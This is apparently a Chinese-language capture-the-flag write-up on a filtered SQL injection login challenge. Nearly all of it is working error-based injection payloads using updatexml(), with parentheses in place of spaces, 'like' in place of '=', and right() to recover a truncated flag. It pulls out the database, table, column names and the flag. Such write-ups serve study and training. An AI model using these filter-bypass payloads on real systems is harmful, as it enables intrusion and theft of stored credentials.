打开题目,SQL注入,看来是有严格限制,但好在没过滤引号
输入部分SQL关键字测试
发现过滤了的关键字有
union
(空格)
=
/*
union注入和堆叠注入均为失败,但会回显报错信息,可以尝试报错注入
这里使用updatexml()
库名
check.php?username=admin&password=1'or(updatexml(1,concat(0x7e,database(),0x7e),1))%23
XPATH syntax error: ‘~geek~’
表名
check.php?username=admin&password=1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23
XPATH syntax error: ‘H4rDsq1’
列名
check.php?username=admin&password=1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))%23
XPATH syntax error: ‘id,username,password’
数据
check.php?username=admin&password=1'or(updatexml(1,concat(0x7e,(select(group_concat(password))from(geek.H4rDsq1)),0x7e),1))%23
XPATH syntax error: ‘~flag{529648dd-e94b-4aad-b2d2-17’
看来是只显示了一半?
substr , mid ,substring 都被过滤了,但没有过滤 right()
check.php?username=admin&password=1'or(updatexml(1,concat(0x7e,right((select(group_concat(password))from(geek.H4rDsq1)),30),0x7e),1))%23
XPATH syntax error: ‘~d-e94b-4aad-b2d2-173d84b36b65}~’